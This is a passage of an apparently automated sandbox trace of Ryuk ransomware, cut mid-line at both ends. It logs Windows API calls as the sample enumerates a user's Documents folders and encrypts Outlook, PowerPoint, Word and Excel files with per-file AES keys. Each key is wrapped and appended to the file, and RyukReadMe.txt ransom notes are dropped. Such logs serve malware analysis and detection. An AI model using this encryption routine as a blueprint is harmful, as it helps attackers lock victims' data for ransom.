dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0155.759] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x74e6, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x74f0) returned 1 [0155.760] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.760] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x74f0, lpOverlapped=0x0) returned 1 [0155.760] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0155.760] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0155.760] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0155.760] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0155.760] CloseHandle (hObject=0x190) returned 1 [0155.778] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.782] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.782] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0155.782] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0155.782] SetLastError (dwErrCode=0x0) [0155.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.783] GetLastError () returned 0x0 [0155.783] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0155.784] CloseHandle (hObject=0x18c) returned 1 [0155.784] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0155.784] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0155.784] SetLastError (dwErrCode=0x0) [0155.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.784] GetLastError () returned 0xb7 [0155.784] CloseHandle (hObject=0x188) returned 1 [0155.784] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.784] SetLastError (dwErrCode=0x0) [0155.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.784] GetLastError () returned 0xb7 [0155.784] CloseHandle (hObject=0x188) returned 1 [0155.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0155.785] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0155.785] SetLastError (dwErrCode=0x0) [0155.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.785] GetLastError () returned 0x0 [0155.785] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0155.786] CloseHandle (hObject=0x188) returned 1 [0155.786] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.786] SetLastError (dwErrCode=0x0) [0155.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.786] GetLastError () returned 0xb7 [0155.786] CloseHandle (hObject=0x188) returned 1 [0155.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0155.787] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.787] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.787] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.787] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", dwFileAttributes=0x80) returned 1 [0155.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.787] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=271360) returned 1 [0155.788] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=271360) returned 1 [0155.788] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x422de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.788] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0155.788] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.788] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0155.788] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.789] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.789] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x42400, lpOverlapped=0x0) returned 1 [0155.795] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0155.795] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x42400, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x42410) returned 1 [0155.797] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.797] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x42410, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x42410, lpOverlapped=0x0) returned 1 [0155.798] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0155.798] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.798] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.798] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0155.798] CloseHandle (hObject=0x18c) returned 1 [0155.810] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.815] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.815] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.815] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0155.815] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0155.815] SetLastError (dwErrCode=0x0) [0155.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.816] GetLastError () returned 0x0 [0155.816] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0155.816] CloseHandle (hObject=0x188) returned 1 [0155.817] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.817] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.817] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pjOzC76-cGZ5qlbT.pptx", dwFileAttributes=0x80) returned 1 [0155.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pjOzC76-cGZ5qlbT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pjozc76-cgz5qlbt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.817] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=76618) returned 1 [0155.817] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=76618) returned 1 [0155.817] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x12a28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.817] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.818] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.818] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.818] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.818] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.818] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12b4a, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x12b4a, lpOverlapped=0x0) returned 1 [0155.820] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.820] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x12b4a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x12b50) returned 1 [0155.820] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.820] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12b50, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x12b50, lpOverlapped=0x0) returned 1 [0155.820] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.820] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.820] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.820] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.821] CloseHandle (hObject=0x188) returned 1 [0155.848] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.853] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.854] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.854] SetLastError (dwErrCode=0x0) [0155.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.854] GetLastError () returned 0xb7 [0155.854] CloseHandle (hObject=0x188) returned 1 [0155.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\styGr-eWlvKp4M\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0155.854] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.854] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.854] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\styGr-eWlvKp4M\\1zvngQCrHPPf7jsy-uV.docx", dwFileAttributes=0x80) returned 1 [0155.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\styGr-eWlvKp4M\\1zvngQCrHPPf7jsy-uV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\stygr-ewlvkp4m\\1zvngqcrhppf7jsy-uv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.855] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=82989) returned 1 [0155.855] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=82989) returned 1 [0155.855] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x1430b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.855] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0155.856] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.856] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0155.856] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.856] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.856] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1442d, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1442d, lpOverlapped=0x0) returned 1 [0155.858] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0155.858] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1442d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x14430) returned 1 [0155.859] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.859] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14430, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x14430, lpOverlapped=0x0) returned 1 [0155.860] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0155.860] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.860] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.860] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0155.860] CloseHandle (hObject=0x18c) returned 1 [0155.876] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.880] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.881] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.881] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.881] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\styGr-eWlvKp4M\\o8i33OwFw7USw_iw3ik.xls", dwFileAttributes=0x80) returned 1 [0155.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\styGr-eWlvKp4M\\o8i33OwFw7USw_iw3ik.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\stygr-ewlvkp4m\\o8i33owfw7usw_iw3ik.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.881] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=94964) returned 1 [0155.881] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=94964) returned 1 [0155.881] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x171d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.881] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0155.882] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.882] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0155.882] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.882] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.882] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x172f4, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x172f4, lpOverlapped=0x0) returned 1 [0155.891] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0155.891] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x172f4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x17300) returned 1 [0155.891] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.891] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17300, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x17300, lpOverlapped=0x0) returned 1 [0155.892] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0155.892] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.892] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.892] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0155.892] CloseHandle (hObject=0x18c) returned 1 [0155.909] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.913] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.913] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0155.913] FindClose (in: 